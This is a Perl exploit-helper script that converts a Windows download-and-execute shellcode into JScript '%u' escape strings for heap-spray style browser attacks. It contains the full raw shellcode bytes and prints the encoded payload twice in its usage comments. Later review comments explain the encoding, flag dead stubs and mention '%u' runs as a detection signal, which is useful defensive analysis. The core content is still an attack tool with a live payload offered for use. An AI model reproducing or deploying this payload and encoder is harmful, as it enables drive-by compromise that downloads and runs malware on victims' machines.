#!/usr/bin/perl
use strict;
# NOTE(review): no 'use warnings;' here, so the undefined-value and
# context mistakes warnings would normally catch go unreported.
# Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode
# Coded by pentest (security.shell@gmail.com)
# pentest..at..security-sh3ll.com
# http://security-sh3ll.com/0day/jscript.txt
# linux Usage:
# bt shellcode
# ./jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211
# windows Usage:
# C:\Documents and Settings\pentest\Desktop>jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211
#
# NOTE(review): The only functional part of this file is convert_shellcode,
# which re-encodes a raw byte string as the "%uXXXX" escape form used by
# JScript's unescape(). The bytes in $shellcode below are the author's
# payload; nothing in this file verifies them, so the "Download & Execute"
# description in the header is the author's claim, not something the code
# demonstrates. For defenders: long runs of "%u" escapes inside script
# content are a well-known artifact of this encoding and a useful detection
# signal; the "%uc933" prefix in the usage lines is simply the first two
# bytes "\x33\xc9" byte-swapped (see the 'LE' branch of convert_shellcode).

# your shellcode here
my $shellcode = "\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x17".
"\x61\xc1\x92\x83\xeb\xfc\xe2\xf4\xeb\x0b\x2a\xdf\xff\x98\x3e\x6d".
"\xe8\x01\x4a\xfe\x33\x45\x4a\xd7\x2b\xea\xbd\x97\x6f\x60\x2e\x19".
"\x58\x79\x4a\xcd\x37\x60\x2a\xdb\x9c\x55\x4a\x93\xf9\x50\x01\x0b".
"\xbb\xe5\x01\xe6\x10\xa0\x0b\x9f\x16\xa3\x2a\x66\x2c\x35\xe5\xba".
"\x62\x84\x4a\xcd\x33\x60\x2a\xf4\x9c\x6d\x8a\x19\x48\x7d\xc0\x79".
"\x14\x4d\x4a\x1b\x7b\x45\xdd\xf3\xd4\x50\x1a\xf6\x9c\x22\xf1\x19".
"\x57\x6d\x4a\xe2\x0b\xcc\x4a\xd2\x1f\x3f\xa9\x1c\x59\x6f\x2d\xc2".
"\xe8\xb7\xa7\xc1\x71\x09\xf2\xa0\x7f\x16\xb2\xa0\x48\x35\x3e\x42".
"\x7f\xaa\x2c\x6e\x2c\x31\x3e\x44\x48\xe8\x24\xf4\x96\x8c\xc9\x90".
"\x42\x0b\xc3\x6d\xc7\x09\x18\x9b\xe2\xcc\x96\x6d\xc1\x32\x92\xc1".
"\x44\x22\x92\xd1\x44\x9e\x11\xfa\xd7\xc9\xc0\xd1\x71\x09\xc9\x3c".
"\x71\x32\x48\x73\x82\x09\x2d\x6b\xbd\x01\x96\x6d\xc1\x0b\xd1\xc3".
"\x42\x9e\x11\xf4\x7d\x05\xa7\xfa\x74\x0c\xab\xc2\x4e\x48\x0d\x1b".
"\xf0\x0b\x85\x1b\xf5\x50\x01\x61\xbd\xf4\x48\x6f\xe9\x23\xec\x6c".
"\x55\x4d\x4c\xe8\x2f\xca\x6a\x39\x7f\x13\x3f\x21\x01\x9e\xb4\xba".
"\xe8\xb7\x9a\xc5\x45\x30\x90\xc3\x7d\x60\x90\xc3\x42\x30\x3e\x42".
"\x7f\xcc\x18\x97\xd9\x32\x3e\x44\x7d\x9e\x3e\xa5\xe8\xb1\xa9\x75".
"\x6e\xa7\xb8\x6d\x62\x65\x3e\x44\xe8\x16\x3d\x6d\xc7\x09\x31\x18".
"\x13\x3e\x92\x6d\xc1\x9e\x11\x92";

# No second argument, so convert_shellcode runs in its default 'LE' mode.
my $jscript =convert_shellcode($shellcode);
# buffer_gen is an empty stub (see below); this call has no effect.
buffer_gen($shellcode);
# Emit the %u-encoded string to STDOUT (no trailing newline).
print $jscript;

# Build a random lowercase string.
#   $wdsize - upper bound of the 0..$wdsize range, so the result has
#             $wdsize + 1 characters (the range is inclusive).
# Returns the generated string.
# NOTE(review): not called anywhere in this file. The empty () prototype
# declares a zero-argument sub, yet the body reads an argument via shift;
# a call such as generate_char($n) placed after this definition would be
# rejected at compile time as having too many arguments.
sub generate_char() {
    my $wdsize = shift;
    my @alphanumeric = ('a'..'z');
    # rand @alphanumeric yields a random index into the 26-letter list.
    my $wd = join '', map $alphanumeric[rand @alphanumeric], 0..$wdsize;
    return $wd;
}

# Re-encode a byte string as a sequence of "%uXXXX" escapes.
#   $data - raw bytes, one byte per character.
#   $mode - 'LE' (default): each byte pair is emitted byte-swapped, so the
#           pair "\x33\xc9" becomes "%uc933" (a little-endian 16-bit unit);
#           any other value emits the two bytes in their original order.
# Returns the escaped string.
# An odd-length input is padded by repeating its final byte so that the
# last pair is complete.
sub convert_shellcode {
    my $data = shift;
    my $mode = shift() || 'LE';
    my $code = '';
    my $idx = 0;
    if (length($data) % 2 != 0) {
        # Duplicate the last byte to complete the final pair.
        $data .= substr($data, -1, 1);
    }
    while ($idx < length($data) - 1) {
        my $c1 = ord(substr($data, $idx, 1));
        my $c2 = ord(substr($data, $idx+1, 1));
        if ($mode eq 'LE') {
            # Low byte last: %u<c2><c1>. '%%' is a literal '%'.
            $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
        } else {
            $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
        }
        $idx += 2;
    }
    return $code;
}

# Stub with no body: the call above does nothing. It is declared with an
# empty () prototype, but since the call site precedes this definition the
# prototype is not applied there, so passing $shellcode does not fail.
sub buffer_gen(){ }